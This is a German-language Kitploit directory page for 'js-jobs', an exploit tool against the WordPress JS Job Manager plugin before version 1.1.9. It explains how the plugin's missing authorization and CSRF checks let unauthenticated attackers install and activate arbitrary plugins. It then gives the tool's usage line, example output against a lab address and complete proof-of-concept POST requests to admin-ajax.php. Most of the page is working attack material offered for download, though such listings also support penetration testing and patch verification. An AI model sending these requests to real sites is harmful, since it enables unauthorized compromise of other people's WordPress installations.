Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
js-jobs — JS Job Manager < 1.1.9 - Unauthhentifizierte beliebige Plugin-Installation/-Aktivierung | Kitploit
Tools/GitHubGitHub/randomrobbiebf/js-jobs
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubrandomrobbiebf/js-jobs

js-jobs

JS Job Manager < 1.1.9 - Unauthhentifizierte beliebige Plugin-Installation/-Aktivierung

Repository anzeigen
14vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

js-jobs

JS Job Manager < 1.1.9 - Nicht authentifizierte Installation/Aktivierung beliebiger Plugins

Beschreibung

Die AJAX-Aktion jsjobs_ajax des Plugins, die sowohl authentifizierten als auch nicht authentifizierten Benutzern zur Verfügung steht, verfügt nicht über ordnungsgemäße Autorisierungs- und CSRF-Prüfungen, insbesondere bei der Verwendung von installPluginFromAjax und activatePluginFromAjax. Dies könnte nicht authentifizierten Angreifern ermöglichen, beliebige Plugins aus dem WordPress-Repository zu installieren und sie (mit einigen Einschränkungen) zu aktivieren.

Es gibt keine Kontrolle über die Version des Plugins, sodass die neueste Version des Plugins installiert wird.

Verwendung

usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s

Beispiel

$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.

Proof of Concept

Um ein Plugin zu installieren:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug>

Um ein Plugin zu aktivieren (hier gibt es eine Einschränkung, da das Plugin die Datei /.php haben muss, andernfalls wird es nicht aktiviert):

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug> 
Tool herunterladen